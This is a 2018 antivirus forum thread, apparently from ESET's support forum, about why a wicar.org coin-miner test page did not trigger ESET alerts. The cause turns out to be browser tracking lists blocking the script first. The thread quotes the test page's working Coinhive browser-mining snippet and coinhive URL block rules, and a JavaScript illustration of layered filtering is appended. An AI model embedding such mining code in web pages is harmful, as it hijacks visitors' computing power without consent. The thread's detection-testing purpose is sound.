itman 1,746 Posted July 27, 2018
http://malware.wicar.org/data/js_crypto_miner.html
This one actually does coin mining. Also doesn't look good that SmartScreen detected it. At least now I can say I found something that SmartScreen detects that Eset doesn't.
Edited July 27, 2018 by itman
Administrators Marcos 5,257 Posted July 27, 2018
I'm getting an alert:
https://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.D potentially unwanted application;blocked
itman 1,746 Posted July 27, 2018
Just to be sure, I disabled SmartScreen in Edge and still no alert from Eset. Sure the same will happen in IE11. Eset always alerts prior to SmartScreen. Running EIS ver. 11.2.42 with default settings as far as Internet Protection goes.
itman 1,746 Posted July 27, 2018
Also, don't believe this is Coin Hive based since I have the following in an Eset URL block list and those didn't trigger either:
*.coinhive.com/*
*.coin-hive.com/*
Administrators Marcos 5,257 Posted July 27, 2018
Not sure what the problem could be. No problems here:
itman 1,746 Posted July 27, 2018
I don't get it either. Below is the code it is executing. The block list should have detected it regardless:

    <html>
    <script src="https://coinhive.com/lib/coinhive.min.js">
    </script><script>var miner = new CoinHive.Anonymous('VrqhGymiL9VzA7DO9YcZNzOVyNkY6tVS', {throttle: 0.3});
    // Only start on non-mobile devices and if not opted-out
    // in the last 14400 seconds (4 hours):
    //if (!miner.isMobile() && !miner.didOptOut(14400)) {
    miner.start();
    //}
    </script>
    </html>

If I click on the coinhive link, the block list detects it. And all PUA detection settings are enabled.
Edited July 27, 2018 by itman
itman 1,746 Posted July 27, 2018
@Marcos, it gets weirder. I am using Easylist Privacy tpl in IE11. Additionally, in Edge, I am using AdGuard extension with both Easylist Privacy and NoCoin lists. All these will detect Coinhive. None of them triggered in this Wicar.org coin miner test. So I went to the AMTSO Desktop Test site and ran the PUA test. Eset performed as expected and alerted on PUA detection. So at this point, I am at a loss as to why this is happening. Also I am running on Win 10 x(64) 1803.
Looks like Wicar.org copied the code straight from here: https://medium.com/@bitcoinloverr/100-latest-coinhive-javascript-mining-trick-monero-b525f38ce545
0xDEADBEEF 43 Posted July 28, 2018
Mine detects it, but I have to disable my adblock plugin to see ESET's prompt because my adblock will block the mining script before ESET kicks in.
itman 1,746 Posted July 28, 2018
- Posting edited to reflect what the issue really was -
Indeed, further testing confirmed tracking protection lists used in Edge and IE11 were intercepting and blocking the connection to coinhive.com prior to Eset having a chance to do likewise.
As far as the SmartScreen alert, it is a bogus one as most browser based SmartScreen alerts are. All SmartScreen is blocking is access to the wicar.org coin miner test web site; not any actual coin mining activity occurring there.
Edited July 29, 2018 by itman
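An added illustration of the finding in the post above (not part of the thread, and not ESET, AdGuard or EasyList code): when filters are stacked, the first layer that blocks a request ends it, so later layers never see it and raise no alert. The layer names, the domain-suffix matching and the `PAGE` sample (built from the quoted test page) are assumptions made for this sketch.

```javascript
// Constructed sample: the test page's external script tag, as quoted in the thread.
const PAGE = '<html><script src="https://coinhive.com/lib/coinhive.min.js"></script></html>';

// Hypothetical layers, in the order a request meets them. Rules are plain domains
// matched as "host or any subdomain" (a simplification of real list syntax).
const BROWSER_LIST = { name: 'browser tracking/adblock list', domains: ['coinhive.com'] };
const AV_FILTER = { name: 'AV web filter', domains: ['coinhive.com', 'coin-hive.com'] };

// Collect the src of every external <script> tag in the page.
function scriptUrls(html) {
  return [...html.matchAll(/<script[^>]*\ssrc=["']([^"']+)["']/gi)].map(m => m[1]);
}

// True when the URL's host equals a listed domain or is a subdomain of it.
function layerBlocks(layer, url) {
  const host = new URL(url).hostname.toLowerCase();
  return layer.domains.some(d => host === d || host.endsWith('.' + d));
}

// Walk the layers in order. The first layer that blocks ends the request,
// so every later layer never inspects it and has nothing to alert on.
function trace(url, layers) {
  const seenBy = [];
  for (const layer of layers) {
    seenBy.push(layer.name);
    if (layerBlocks(layer, url)) {
      const silent = layers.slice(seenBy.length).map(l => l.name);
      return { url, blockedBy: layer.name, seenBy, silent };
    }
  }
  return { url, blockedBy: null, seenBy, silent: [] };
}

function report(html, layers) {
  return scriptUrls(html).map(u => trace(u, layers));
}

// Browser list active: the AV filter is listed under "silent".
console.log(report(PAGE, [BROWSER_LIST, AV_FILTER]));
// Browser list disabled: the AV filter is the layer that blocks.
console.log(report(PAGE, [AV_FILTER]));
```

When testing one protection layer, disable the layers in front of it first; a missing alert from a later layer is otherwise not evidence that it failed.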
itman 1,746 Posted July 28, 2018
Will also add that I found an obscure European coinhive test web site that SmartScreen does not detect to test Eset's coin miner protection.
Edited July 29, 2018 by itman